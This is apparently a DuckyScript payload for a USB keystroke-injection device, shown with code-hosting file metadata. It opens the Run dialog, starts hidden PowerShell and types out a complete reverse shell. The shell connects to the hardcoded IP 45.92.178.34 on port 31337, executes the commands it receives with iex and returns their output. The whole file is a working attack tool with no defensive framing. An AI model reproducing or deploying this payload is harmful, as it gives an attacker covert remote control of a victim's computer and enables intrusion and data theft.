36 lines
1.1 KiB
Plaintext
36 lines
1.1 KiB
Plaintext
DELAY 1500
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell -NoP -NonI -W Hidden -Command
|
|
DELAY 250
|
|
ENTER
|
|
DELAY 200
|
|
|
|
STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
|
|
DELAY 100
|
|
STRING $stream = $client.GetStream();
|
|
DELAY 100
|
|
STRING [byte[]]$buffer = 0..65535|%{0};
|
|
DELAY 100
|
|
STRING function Set-CultureWin([System.Globalization.CultureInfo] $culture) { [System.Threading.Thread]::CurrentThread.CurrentUICulture = $culture ; [System.Threading.Thread]::CurrentThread.CurrentCulture = $culture } ; Set-CultureWin en-US ; [system.threading.thread]::currentthread.currentculture
|
|
DELAY 100
|
|
STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
|
|
DELAY 100
|
|
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
|
|
DELAY 100
|
|
STRING $sendback = (iex $data 2>&1 | Out-String );
|
|
DELAY 100
|
|
STRING $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
|
|
DELAY 100
|
|
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
|
|
DELAY 100
|
|
STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
|
|
DELAY 100
|
|
STRING $stream.Flush()
|
|
DELAY 100
|
|
STRING };
|
|
DELAY 100
|
|
STRING $client.Close()
|
|
DELAY 100
|
|
ENTER
|